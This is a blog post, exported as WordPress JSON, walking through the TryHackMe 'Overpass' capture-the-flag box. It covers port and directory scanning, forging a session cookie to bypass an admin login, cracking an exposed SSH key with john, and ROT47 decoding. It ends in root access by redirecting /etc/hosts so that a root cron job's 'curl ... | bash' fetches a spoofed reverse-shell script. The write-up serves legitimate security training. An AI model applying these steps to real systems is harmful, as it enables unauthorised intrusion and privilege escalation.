{"id":130824,"date":"2022-12-25T14:48:39","date_gmt":"2022-12-25T14:48:39","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1000564"},"modified":"2022-12-25T14:48:39","modified_gmt":"2022-12-25T14:48:39","slug":"how-i-hacked-a-pw-manager-tryhackme-overpass-1","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2022\/12\/25\/how-i-hacked-a-pw-manager-tryhackme-overpass-1\/","title":{"rendered":"How I Hacked a PW Manager (TryHackMe Overpass 1)"},"content":{"rendered":"\n
\n
\n
\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n<\/p><\/div>\n
\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n
\n
<\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/div>\n
5\/5 – (1 vote) <\/div>\n<\/p><\/div>\n
\"YouTube<\/a>
<\/figcaption><\/figure>\n

PREMISE<\/h2>\n

The premise of the box is that a group of computer science students has created a password encryption\/decryption tool. <\/p>\n

\n
\"\"
Target<\/strong>: One of the CS students posing on a party<\/em> \"\ud83d\ude09\"<\/figcaption><\/figure>\n<\/div>\n
\"\ud83d\udc49\" \"What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!\"<\/em> <\/pre>\n
We are tasked with hacking our way into their server as the root user. <\/p>\n
\n
\"\"
Attacker<\/strong>: A sophisticated hacker – not who you may expect.<\/em><\/figcaption><\/figure>\n<\/div>\n
This capture-the-flag challenge on TryHackMe involves cookie creation and file spoofing in order to escalate privileges to the root user. It is rated as an easy box. If you don\u2019t like spoilers, I\u2019d recommend trying this free hacking challenge <\/a>first before reading any further.<\/p>\n
This box is the first in a three-part series. In part two, we will be doing some basic forensics after a cyber attack hits the overpass server. <\/p>\n
And in part three we will prove to the Overpass developers that they need to make some security upgrades to their server hosting.<\/p>\n
First, let\u2019s record our IPs and get them ready to export as Linux variables.<\/p>\n
export targetIP=10.10.179.249\nexport myIP=10.6.2.23<\/pre>\n
ENUMERATION<\/h2>\n
\n
\"\"<\/figure>\n<\/div>\n
A simple nmap<\/code> scan shows the following results:<\/p>\n
\u250c\u2500[kalisurfer@parrot]\u2500[~\/THM\/overpass-walkthrough]\n\u2514\u2500\u2500\u257c $sudo nmap $targetIP\n[sudo] password for kalisurfer:\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2022-12-21 06:01 EST\nNmap scan report for 10.10.179.249\nHost is up (0.087s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds\n---\n<\/pre>\n
Nothing is surprising here. These are the standard ports for HTTP web applications and ssh<\/code> services.\u00a0<\/p>\n
Next, we\u2019ll run a dirb<\/code> scan to do some directory sniffing. Our dirb<\/code> scan results reveal a few interesting HTML directories. We\u2019ll take a closer look into each of these leads.<\/p>\n
\/admin\n\/aboutus\n\/css\n\/downloads<\/pre>\n
We find the plaintext sourcecode in the \/downloads<\/code> folder! <\/p>\n
This will almost certainly be worth looking at closely for more information about the encryption mechanism. Posting the sourcecode is the first of several horrible decisions the Overpass dev team has made with their password storage program. <\/p>\n
Some of the takeaways from examining the source code are:<\/p>\n
    \n
  1. The encryption method used is a caesar cypher<\/a> with a rotation of 47. There is a link in the sourcecode pointing to: https:\/\/socketloop.com\/tutorials\/golang-rotate-47-caesar-cipher-by-47-characters-example<\/a><\/li>\n
  2. Encrypted passwords are saved locally in a hidden file .passlist<\/code> in the root directory. This will probably be are method for retrieving the root password after we gain an initial foothold into the system.<\/li>\n
  3. This encryption (ROT47) is invertible, which means to decrypt a password all we have to do is run the ROT47 cipher code a second time.<\/li>\n<\/ol>\n
    There is also an executable file for each operating system of the password storage tool. Download and running the program overpassLinux<\/code> shows that we can retrieve passwords as long as there is a .overpass<\/code> hidden file in the \/root<\/code> directory.<\/p>\n
    INITIAL FOOTHOLD VIA COOKIE CREATION<\/h2>\n
    We find a login portal at $targetIP\/admin<\/code>. <\/p>\n
    First, we inspect the login with burpsuite<\/code> and carefully examine the response to an unsuccessful username:password<\/code>, noticing that the user is rerouted to \/admin<\/code> after an unsuccessful login attempt. <\/p>\n
    Instead of wasting time attempting to bruteforce<\/code> our way in with a wordlist, we use firefox in developer mode and discover that there are no stored cookies. If we create a new cookie with the name SessionToken, and a reroute path of \u201c\/<\/code>\u201d we find a hidden encrypted ssh<\/code> key. Voila!<\/p>\n
    Since you keep forgetting your password, James, I've set up SSH keys for you. If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.\nAlso, we really need to talk about this \"Military Grade\" encryption. - Paradox -----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 LNu5wQBBz7pKZ3cc4TWlxIUuD\/opJi1DVpPa06pwiHHhe8Zjw3\/v+xnmtS3O+qiN\nJHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal\n73\/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT\nWDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ\/Hha4jDykUXP0PvuFyTbVdv\nBMXmr3xuKkB6I6k\/jLjqWcLrhPWS0qRJ718G\/u8cqYX3oJmM0Oo3jgoXYXxewGSZ\nAL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT\/9kvUiL3rhkBURhVIbj2qiHxR\n3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ\/UprNCAgeGTlZKX\/joruW7ZJuAUf\nABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk\nVfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW\/r\/Yc1RmNTfzT5eeR\nOkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P\n9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze\neaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ\n4TBApY+uz34JXe8jElhrKV9xw\/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8\nGFheoT4yFwrXhU1fjQjW\/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt\/h2M5nowjcbYn\nexxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy\nAIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk\n6p7\/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58\ndPm51MekHD+WeP8oTYGI4PVCS\/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i\nn0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT\n8HiUKTEsukcv\/IYHK1s+Uw\/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K\n4FMg3ng0e4\/7HRYJSaXLQOKeNwcf\/LW5dipO7DmBjVLsC8eyJ8ujeutP\/GcA5l6z\nylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS\n49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2\n+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk\n2cWk\/Mln7+OhAApAvDBKVM7\/LGR9\/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7\n-----END RSA PRIVATE KEY-----\n<\/code><\/pre>\n
    It looks like our initial foothold will be as the user james<\/code>. Let\u2019s pause for a moment to collect our thoughts and plan out the next steps in our attack.<\/p>\n
    RETRIEVING THE PASSCODE FOR THE ENCRYPTED SSH FILE<\/h2>\n
    This is our plan going forward to retrieve the passcode for the encrypted ssh file:<\/p>\n
      \n
    1. Save the ssh<\/code> key string as a new file (without the header and footer).<\/li>\n
    2. Use ssh2john<\/code> to prep the hash for john the ripper.<\/li>\n
    3. Use john to crack that hash and find key our ssh<\/code> keyfile passcode<\/li>\n<\/ol>\n
      SSHing INTO USER JAMES<\/h2>\n
      With the following command, we can now log in as james<\/code> with our trusty ssh passcode and ssh keyfile. The user.txt<\/code> flag is right there in James\u2019 home folder.<\/p>\n
      !!!\nThm{65c 6bf7}\n!!!<\/code>\n<\/pre>\n
      USING OVERPASSLINUX TO RETRIEVE THE USER PASSWORD<\/h2>\n
      Now that we are in as user James, we can run the overpass program again on the encoded string (,LQ?2> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 8A:4EFC6QN<\/code>.)<\/p>\n
      We hit a small snag, seeing that user James doesn\u2019t have proper permissions to run overpassLinux<\/code> on target machine. Using SCP we can copy James\u2019 .overpass<\/code> file to our attack machine. Running overpassLinux on our machine, we can now recover James\u2019 account password.\u00a0<\/p>\n
      I decided to use python3<\/code> to create a rot47 encryption\/decryption script. A quick google search brought up the following script:<\/p>\n
      def rot47(s): x = [] for i in range(len(s)): j = ord(s[i]) if j >= 33 and j <= 126: x.append(chr(33 + ((j + 14) % 94))) else: x.append(s[i]) return ''.join(x) s=\",LQ?2> 8A:4EFC6QN.\"\nprint(rot47(s))\n<\/pre>\n
      Using nano to edit the script, I added a few tweaks to make it run smoothly on my machine and decrypt James\u2019 password. <\/p>\n
      [{\"name\":\"System\",\"pass\":\" \"}]\n!!! (james password)<\/code>\n<\/pre>\n
      FURTHER ENUMERATION FOR POTENTIAL ATTACK VECTORS<\/h2>\n
      First, I explored whether or not there are setuid<\/code> bins that user james can run on the system with the following command:<\/p>\n
      james@overpass-prod:~$ find \/bin -perm -4000 \u2014\n\/bin\/fusermount\n\/bin\/umount\n\/bin\/su\n\/bin\/mount\n\/bin\/ping\n\u2014\n<\/code><\/pre>\n
      Looking each of these bins up on gtfobins<\/code> showed that there aren\u2019t any clear paths forward yet\u2026<\/p>\n
      Checking the kernel on https:\/\/www.exploit-db.com\/<\/a> showed a potential lead – a kernel exploit found on target machine! (https:\/\/www.exploit-db.com\/exploits\/47163<\/a> (CVE-2019-13272)). <\/p>\n
      However, after compiling the exploit and running it on the target machine, the exploit failed saying that this machine is not vulnerable.\u00a0<\/p>\n
      Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n[.] Checking environment ...\n[!] Warning: Could not find active PolKit agent\n[.] Searching for known helpers ...\n[.] Searching for useful helpers ...\n[.] Ignoring blacklisted helper: \/usr\/lib\/update-notifier\/package-system-locked\n<\/code><\/pre>\n
      Running the attack with Metasploit using the PTRACE_TRACEME<\/code> module also failed, confirming my hunch that this isn\u2019t a viable attack vector.\u00a0<\/p>\n
      FINDING A VIABLE ATTACK VECTOR FOR PRIVILEGE ESCALATION<\/h2>\n
      Next, we check the crontab on the target machine for any automated programs set to run regularly:<\/p>\n
      cat \/etc\/crontab<\/pre>\n
      And bingo! We found a viable escalation path -!!! <\/p>\n
      The following output shows that buildscript.sh<\/code> is set to run as root<\/em> every minute as a curl<\/code> command from overpass.thm\/downloads\/src\/<\/code>.<\/p>\n
       * * * * root curl overpass.thm\/downloads\/src\/buildscript.sh | bash\n<\/pre>\n
      Here is our plan going forward to exploit this system misconfiguration:<\/p>\n
        \n
      1. First, change the \/etc\/hosts<\/code> file on our target machine to hijack the overpass.thm<\/code> domain by rerouting it to our attack machine\u2019s IP<\/li>\n
      2. Use revshells.com<\/strong><\/em> to create a reverse shell payload to our netcat listener<\/li>\n
      3. Create a spoof of buildscript.sh<\/code> with the malicious payload and locate it at $myIP:\/downloads\/src\/buildscript.sh<\/code><\/li>\n
      4. Spin up a simple HTTP server on port 80 from our attack machine, serving up the spoofed file in the correct directory (\/downloads\/src\/<\/code>)<\/li>\n
      5. Boot up a Netcat listener on the port we specified in the revshell<\/a><\/code> payload.<\/li>\n
      6. Wait for a maximum of 60 seconds to catch the reverse shell as root!<\/li>\n<\/ol>\n
        \u00a0Thm{7f33 53bb}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
        5\/5 – (1 vote) PREMISE The premise of the box is that a group of computer science students has created a password encryption\/decryption tool. Target: One of the CS students posing on a party “What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!” […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-130824","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/130824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=130824"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/130824\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=130824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=130824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=130824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}